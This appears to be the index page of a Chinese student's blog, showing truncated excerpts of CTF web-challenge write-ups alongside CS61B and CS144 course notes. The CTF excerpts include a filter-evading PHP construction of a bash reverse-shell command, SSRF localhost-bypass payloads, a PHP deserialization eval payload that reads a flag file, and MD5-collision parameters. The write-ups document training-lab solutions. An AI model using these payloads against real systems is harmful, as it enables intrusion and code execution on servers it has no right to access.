柚子のBlog

WebSimple_PHP过滤了很多东西，首先尝试参数逃逸不太成功。 然后发现它ban的大多数是查看文件的，和它杠到底，base32没过滤干净，可以读文件，但是.?*这种通配符被ban了，不太好描述文件啊。 考虑反弹shell，通过拼接构造： 12345678<?php $c=array_keys(localeconv())[3][0]; $h=array_keys(localeconv())[1][1]; $r=array_keys(localeconv())[2][6]; $f=join(null,array($c,$h,$r)); system(join(null,array( $f(98),$f(97),$f(115),$f(104),$f(32),$f(45),$f(99),$f(32),$f(34),$f(98),$f(97),$f(115) )));//通过这种方式构造命令，我删了后半截有关我vps的ip的部分 获得shell之后没找到flag文件，看一下内网环境：ss -tuln 发现有3306端口开着，flag藏在里面。 使用mysql - ...

Gitlet Design DocumentName: yoo2i 前言本篇记录了我在做proj2 Gitlet时候对系统结构和各个函数的设计，同时也记录了我遇到的一些代码问题，希望能帮到后来人。 建议还是自己写，大框架自己定下来不要照搬别人的，这样才能得到最大程度的锻炼。实在出不来可以参考一下我的结构。 代码均在GitHub：cs61b/proj2 at master · yoo2i/cs61b (github.com) 关于merge的代码是最后写的，由于逻辑复杂加上时间不足，写的实在是烂，请不要参阅。如果未来有时间的话我会重构的（下次一定 some problems1.sha1无法调用 它只接受字符串or字节数组，其他对象需要转化为字节数组。 java对象和byte数组互转 - 代码四四五 (code445.com) 2.安排hash这个变量放在会计算hash的类中，方便后面编码。 3.尽量封装方便未来代码复用。 4.真实.git/object将40位的哈希值拆成2+38来组织文件夹是为了方便查询，因为支持只输入前几个字符来确定commit，所以可 ...

web351靶机的/flag.php可以访问，会返回报错。 url = http://127.0.0.1/flag.php web352它的正则检查是错的，只给了正则规则没给要搜的对象，所以上个题的payload可以继续用。 web353不能用localhost和127.0.0.1，提供一点payload： 12345进制绕过 url=http://0x7F000001/flag.php 等效于127.0.0.10.0.0.0绕过 url=http://0.0.0.0/flag.php特殊的地址0 url=http://0/flag.php还有 url=http://127.1/flag.php还有 url=http://127.0000000000000.001/flag.php 来源是：CTFSHOW-SSRF篇 - LinkPoc - 博客园 (cnblogs.com)，感恩。 web354过滤了01，可以提供一个域名解析到127.0.0.1 1234567http://safe.taobao.com/http://114.taobao.com ...

已经实现的代码都在GitHub，欢迎拷打：yoo2i/cs61b (github.com) proj0单纯熟悉Java语法的，没啥坑，略过。 proj1 看完第11节才能学完迭代器和类方法的重写，写的时候没学过的不用写 要求里会让你抽象出一个deque的接口，没有这个接口自动评分机编译过不去的，还是那句话，别着急 编写随机测试对照组出现空指针错误 原因是deque模板类型设为int，int没法接受空值的比较，改成Integer就ok（proj1ec文档里更详细解释了） ArrayDeque建议 最好用循环数组，维护好前后的两个指针，最好把移动这两个指针抽象出来做成函数，以后不管是扩容还是其他都调用函数就完事 课上教的instanceof语法评分机报错 1o instanceof LinkedListDeque test 这是高版本java特性，评分机没这么先进，强制类型转换就好了。 123if (o instanceof LinkedListDeque) { LinkedListDeque test = (LinkedListDeq ...

假期的训练赛 Webphp_hacker非常经典的复建题 12345678910111213141516171819<?phperror_reporting(0);highlight_file(__FILE__);class Executor { public $command; public function __wakeup() { if(isset($this->command)) { eval($this->command); } }}$a = new Executor();$a -> command = "system(\"cat /f_l_a_g\");";//字符串里面转义一下就好了$payload = serialize($a);printf(base64_encode($payload));?> ez_sqli/search有回显，选择这个比较爽 搜一下1，观察请求体TVE9PQ%3d%3d，发现经 ...

已经实现的代码都在GitHub，欢迎拷打：yoo2i/cs61b (github.com) 前言开启了数据结构的旅程，版本是21spring，先给出我用到的链接： 课程首页链接，提供了本课的主要脉络 带中文字幕的课程视频 自动评分机的邀请码 自动评分机网站 本文将更新我在做lab时遇到的各种困难，包括但不限于配置问题、思路问题等等。 proj遇到的问题将放在另一篇文章里。 （下文待整理） 遇到的一些问题： 1.新IDEA没有教程里所说的那个“For new projects” 打开看一眼的 2.还是pom.xml “找不到插件 ‘org.apache.maven.plugins:maven-compiler-plugin:3.1’” lab2 setup 新idea没有为未来所有项目 直接在欢迎界面设就ok 按着教程设置完找不到maven，pom.xml报错之类的 文档里说找maven的路径可以是pwd得来的，但是结果不符合Windows路径格式，别信，Windows是D:\test\test这样子，和它输出的不完全一样 lab3 lab4没遇到问题这俩，也可能是 ...

EzHttp123456789101112131415161718POST / HTTP/1.1Host: 1.117.175.65:23333O2TAKUXX: GiveMeFlagContent-Length: 44Cache-Control: max-age=0Upgrade-Insecure-Requests: 1User-Agent: SycloverX-Forwarded-For: 127.0.0.1Via: Syc.vipOrigin: http://1.117.175.65:23333Content-Type: application/x-www-form-urlencodedAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Referer: sycsec.comAccept-Encoding: gzip, deflateAccept-L ...

我的数据结构太烂了，lab1推进不下去，待我重搞完数据结构再来更cs144了。 1.make check_lab0无效 -》虚拟网络设置恢复默认 merge失败 -> 删除多余^m 宿舍和教室网络不同，分配的ip不一样->vscode无法登录（写入管道不存在）->用Windows登录一次后再用vscode登录就好了

校内比赛，被干碎了呜呜呜 rm -rf *12345678910111213141516171819202122232425<?phphighlight_file(__FILE__);$a = $_POST['spirit'];$b = $_POST['2023'];$c = $_POST['Are_you_a_freshman'];if ($c == "NO") { //给老东西的福利 include("hint.php"); die("flag送你了,老东西应得的!");}if (isset($a) && isset($b)) { if (strpos($a, '..') !== false) { die('老实点'); } if (!preg_match('/.php$/i', basename($a))) { //我知道 ...

是近期遇到的最难的新生赛，几乎每个题都有挑战，所以决定记录一番。 Week 1signinjs脚本里 baby_php1?a=M%C9h%FF%0E%E3%5C%20%95r%D4w%7Br%15%87%D3o%A7%B2%1B%DCV%B7J%3D%C0x%3E%7B%95%18%AF%BF%A2%00%A8%28K%F3n%8EKU%B3_Bu%93%D8Igm%A0%D1U%5D%83%60%FB_%07%FE%A2&b=M%C9h%FF%0E%E3%5C%20%95r%D4w%7Br%15%87%D3o%A7%B2%1B%DCV%B7J%3D%C0x%3E%7B%95%18%AF%BF%A2%02%A8%28K%F3n%8EKU%B3_Bu%93%D8Igm%A0%D1%D5%5D%83%60%FB_%07%FE%A2&b=M%C9h%FF%0E%E3%5C%20%95r%D4w%7Br%15%87%D3o%A7%B2%1B%DCV%B7J%3D%C0x%3E%7B%95%18%AF%BF%A2%02%A8%28K%F3n%8EKU%B3_Bu%93%D8Igm ...